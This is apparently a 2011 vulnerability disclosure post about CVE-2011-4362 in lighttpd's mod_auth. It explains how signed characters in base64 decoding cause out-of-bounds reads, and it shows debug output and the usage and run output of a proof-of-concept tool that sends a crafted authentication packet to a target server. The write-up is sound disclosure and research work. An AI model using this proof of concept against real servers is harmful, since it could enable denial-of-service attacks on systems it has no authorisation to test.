Lighttpd Proof of Concept code for CVE-2011-4362

29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that mod_auth for this server does not propely decode characters from the extended ASCII table. The vulnerable code is below: "src/http_auth.c:67" --- CUT --- static const short base64_reverse_table[256] = ...; static unsigned char * base64_decode(buffer *out, const char *in) { ... int ch, ...; size_t i; ... ch = in[i]; ... ch = base64_reverse_table[ch]; ... } --- CUT --- Because variable 'in' is type 'char', characters above 0x80 lead to negative indices. This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table table cause this situation. I have added some extra debug in the lighttpd source code to see if this vulnerability is executed correctly. Here is output for one of the example: --- CUT --- ptr[0x9a92c48] size[0xc0] used[0x0] 127(. | 0 | 0) -128(t | 1 | 0) -127(e | 2 | 1) -126(' | 3 | 2) -125(e | 4 | 3) -124(u | 5 | 3) -123(r | 6 | 4) -122(' | 7 | 5) -121(s | 8 | 6) -120(c | 9 | 6) -119(i | 10 | 7) -118(n | 11 | 8) -117(i | 12 | 9) -116( | 13 | 9) -115(a | 14 | 10) -114(t | 15 | 11) -113(. | 16 | 12) -112(e | 17 | 12) -111(u | 18 | 13) -110(r | 19 | 14) -109(' | 20 | 15) -108(f | 21 | 15) -107(i | 22 | 16) -106(e | 23 | 17) -105(: | 24 | 18) -104(= | 25 | 18) -103(o | 26 | 19) -102(t | 27 | 20) -101(o | 28 | 21) -100( | 29 | 21) -99(a | 30 | 22) -98(g | 31 | 23) -97(. | 32 | 24) -96(d | 33 | 24) -95(g | 34 | 25) -94(s | 35 | 26) -93(: | 36 | 27) -92(u | 37 | 27) -91(s | 38 | 28) -90(p | 39 | 29) -89(o | 40 | 30) -88(t | 41 | 30) -87(d | 42 | 31) -86(b | 43 | 32) -85(c | 44 | 33) -84(e | 45 | 33) -83(d | 46 | 34) -82(( | 47 | 35) -81(n | 48 | 36) -80(y | 49 | 36) -79(h | 50 | 37) -78(d | 51 | 38) -77(g | 52 | 39) -76(s | 53 | 39) -75( | 54 | 40) -74(r | 55 | 41) -73(p | 56 | 42) -72(a | 57 | 42) -71(n | 58 | 43) -70(. | 59 | 44) -69(. | 60 | 45) -68(d | 61 | 45) -67(g | 62 | 46) -66(s | 63 | 47) -65(: | 64 | 48) -64(( | 65 | 48) -63(d | 66 | 49) -62(- | 67 | 50) -61(e | 68 | 51) -60(s | 69 | 51) -59( | 70 | 52) -58(i | 71 | 53) -57(s | 72 | 54) -56(n | 73 | 54) -55( | 74 | 55) -54(i | 75 | 56) -53(l | 76 | 57) -52(. | 77 | 57) -51(. | 78 | 58) -50(k | 79 | 59) -49(0 | 80 | 60) -48(% | 81 | 60) -47(] | 82 | 61) -46(p | 83 | 62) -45(r | 84 | 63) -44(0 | 85 | 63) -43(% | 86 | 64) -42(] | 87 | 65) -41(s | 88 | 66) -40(z | 89 | 66) -39([ | 90 | 67) -38(x | 91 | 68) -37(x | 92 | 69) -36( | 93 | 69) -35(s | 94 | 70) -34(d | 95 | 71) -33(0 | 96 | 72) -32(% | 97 | 72) -31(] | 98 | 73) -30(. | 99 | 74) -29(. | 100 | 75) -28(d | 101 | 75) -27(c | 102 | 76) -26(d | 103 | 77) -25(i | 104 | 78) -24(g | 105 | 78) -23(b | 106 | 79) -22(s | 107 | 80) -21(6 | 108 | 81) -20(- | 109 | 81) -19(t | 110 | 82) -18(i | 111 | 83) -17(g | 112 | 84) -16(f | 113 | 84) -15(i | 114 | 85) -14(e | 115 | 86) -13(. | 116 | 87) -12(. | 117 | 87) -11(. | 118 | 88) -10(. | 119 | 89) -9(. | 120 | 90) -8(. | 121 | 90) -7(. | 122 | 91) -6(. | 123 | 92) -5(. | 124 | 93) -4(. | 125 | 93) -3(. | 126 | 94) -2(. | 127 | 95) -1(. | 128 | 96) k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0] ptr[0x9a92c48] size[0xc0] used[0x60] string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.] --- CUT --- First column is the offset so vulnerability is executed like it should be (negative offsets). Second column is byte which is read out-of-bound. How to run this very primitive Proof of Concept? $ gcc p_cve-2011-4362.c -o p_cve-2011-4362 $ ./p_cve-2011-4362 ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::... Usage: ./p_cve-2011-4362 <options> Options: -v <victim> -p <port> -d <remote_dir_for_auth> $ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::... [+] Preparing arguments... OK [+] Creating socket... OK [+] Connecting to [127.0.0.1]... OK [+] Sending dirty packet... OK [+] Check the website! $ Lighttpd will log this situation probably in error-log file like this: --- CUT --- .. .. 2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in �Yg\���n�Xt�]rze���gY��\��Yb�Y(�d��r�[Y���-�xi��i�k�Wp� ]߶��\���@V��x���ize --- CUT --- Maybe you can find vulnerable binary? Best regards, Adam 'pi3' Zabrocki -- http://pi3.com.pl http://www.exploit-db.com/sploits/p_cve-2011-4362.c http://blog.pi3.com.pl/?p=277